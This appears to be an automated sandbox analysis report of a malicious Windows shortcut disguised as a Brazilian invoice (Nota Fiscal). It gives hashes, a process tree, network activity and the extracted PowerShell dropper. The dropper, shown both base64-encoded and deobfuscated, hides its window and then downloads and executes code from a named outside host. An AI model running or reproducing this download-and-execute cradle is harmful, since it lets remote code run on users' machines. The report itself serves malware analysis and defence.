Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 20:53 UTC

General

  • Target

    NotaFiscal_Danfe_N43553454BR.lnk

  • Size

    2KB

  • MD5

    c3996410f80fd3137feb0f42074c71ca

  • SHA1

    2da7caa8372ddb9e6601a029ed3d2128b5263b08

  • SHA256

    11718e47eee14d48ff490b5443e430607968f9a18d95272e72e128c0c97c6234

  • SHA512

    a706a0cd9c1a0443476067221786518a46c614a91f0937f384c7e8068d2ed85ff05e243e964556b34fc4c363d7296d229a47db1a37e78382825cf4f37294cb78

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
py
2
add-type -name a -memberdefinition "[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int h, int s);" -namespace b
3
[b.a]::showwindow(([system.diagnostics.process]::getcurrentprocess()|ps).mainwindowhandle, 0)
4
invoke-expression (new-object net.webclient).downloadstring("https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%")
5
URLs
ps1.dropper

https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\NotaFiscal_Danfe_N43553454BR.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en cAB5ADsAYQBkAGQALQBUAFkAcABFACAALQBuAGEATQBFACAAQQAgAC0ATQBlAE0AYgBFAHIARABFAGYAaQBuAEkAVABpAE8ATgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAG4AQQBNAEUAcwBwAGEAQwBlACAAQgA7AFsAYgAuAEEAXQA6ADoAUwBIAE8AdwBXAEkAbgBkAE8AVwAoACgAWwBTAFkAcwB0AGUAbQAuAEQASQBhAGcATgBPAHMAVABpAEMAcwAuAFAAcgBPAEMAZQBzAHMAXQA6ADoAZwBlAHQAQwBVAFIAUgBlAG4AVABQAHIATwBDAEUAcwBTACgAKQAgAHwAIABQAFMAKQAuAE0AYQBJAE4AdwBpAG4ARABvAHcAaABhAG4ARABMAGUALAAwACkAOwBJAGUAWAAoAE4AZQBXAC0ATwBiAGoAZQBDAHQAIABOAGUAVAAuAFcAZQBiAEMATABpAGUAbgBUACkALgBEAE8AdwBOAEwATwBhAEQAUwBUAHIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAGUAcABvAGcAeQAuAGUAcABpAGEAaQBuAC4AYwBvAG0ALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBIAE0ANgBMAHkAOQB6AFoAWABCAHYAWgAzAGsAdQBaAFgAQgBwAFkAVwBsAHUATABtAE4AdgBiAFMAOQAyAE0AbgB3ADIATgBEAGgAUgAlACcAKQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\orabdere.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2576
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4876.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4875.tmp"
          4⤵
            PID:3016

    Network

    • flag-us
      DNS
      sepogy.epiain.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      sepogy.epiain.com
      IN A
      Response
    No results found
    • 8.8.8.8:53
      sepogy.epiain.com
      dns
      powershell.exe
      63 B
      136 B
      1
      1

      DNS Request

      sepogy.epiain.com

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES4876.tmp

      Filesize

      1KB

      MD5

      2272bf3fbe8396f5d7857c1d1bfcfd91

      SHA1

      8dfd912cb7a13b3849821f66b4b4f9ded7359b73

      SHA256

      0a71415d4a404eeafa1015a35aeef09106e6bb7e83164a81181fffe7860c2087

      SHA512

      a7e14ec8da5d50afb0a668511dc87233c71270c875a33e15f266b1b3dc27a0c8be1e656c6ff8d5f09932799a3a32a28bad9edc769fc618f759dc39e4779d88a2

    • C:\Users\Admin\AppData\Local\Temp\orabdere.dll

      Filesize

      3KB

      MD5

      1a97587d8bcadd756967a8d69440e8a2

      SHA1

      b39a5abcb8281119d0b82b9bd30814a463998681

      SHA256

      838c02ec76fcadef201351a326c96cb8cd0cdbe87c0b30c9beedbad6ea0c68cf

      SHA512

      141444319e5268fb8dc70116cbdeb47c5913680c5af8dee1bd0b049561684bed137c663c800e258be4304c3b84a345edcc3acc796298eba90ec88f5428f5a4e7

    • C:\Users\Admin\AppData\Local\Temp\orabdere.pdb

      Filesize

      7KB

      MD5

      b1b57e1f54d073d9e6040c3d9ee8d48e

      SHA1

      b200d3d9378e2c3fb0bd9640038412206c6eae21

      SHA256

      d170fab5283b33d67d4644c3bf5c32758863271bf0377a3ed602dffe07947f04

      SHA512

      260896d63892c4c71af0d87560e185549fc933971c5611ef83a2588ac25348e42b1376a2cf3cec44419d3288373bf3d86029344ed536602083bf3db1915e2c28

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC4875.tmp

      Filesize

      652B

      MD5

      640b2a30551bfe0d8ec7d66695c2b2dc

      SHA1

      d4bd9ce277bf8b9608dc485f4e4edbd0acde65b3

      SHA256

      45952cf0d1195f632811d0874f978f18703f9498a9d7343562299dcaf635fd0d

      SHA512

      0e354fdfcc4989dc4539142c00ba3ede28bedc0a4481f9f79582e018b5c3fcbca3c182ff0d222488152503b90dd928c3401b073a759e085458939d043349aa7a

    • \??\c:\Users\Admin\AppData\Local\Temp\orabdere.0.cs

      Filesize

      187B

      MD5

      7b0e7177dfbb9edd1c1ef08b4fdfae2f

      SHA1

      cb11a0252cdad66ec247312ccb7feb46456e52b6

      SHA256

      6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

      SHA512

      7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

    • \??\c:\Users\Admin\AppData\Local\Temp\orabdere.cmdline

      Filesize

      309B

      MD5

      6fbf3893d649e4b2cad7ac875cdcee53

      SHA1

      954dc1f600f078200b3c789c12f39c41c694d4af

      SHA256

      04d393ef7424994cfa3ff6fb47158976da4a6b83ceb2ee8be03dde7a8a5baaee

      SHA512

      b055a582f124987f0ac0df4b84efac18a7a8e511ba56017bc89050dc5c2ae535ffee2c0376ba5da0f23b3522ebf6c13e403d38961f9734d44f807edeee09e154

    • memory/2744-42-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-49-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-46-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-38-0x000007FEF575E000-0x000007FEF575F000-memory.dmp

      Filesize

      4KB

    • memory/2744-41-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-40-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

    • memory/2744-58-0x00000000029F0000-0x00000000029F8000-memory.dmp

      Filesize

      32KB

    • memory/2744-39-0x000000001B6A0000-0x000000001B982000-memory.dmp

      Filesize

      2.9MB

    • memory/2744-61-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-62-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-63-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.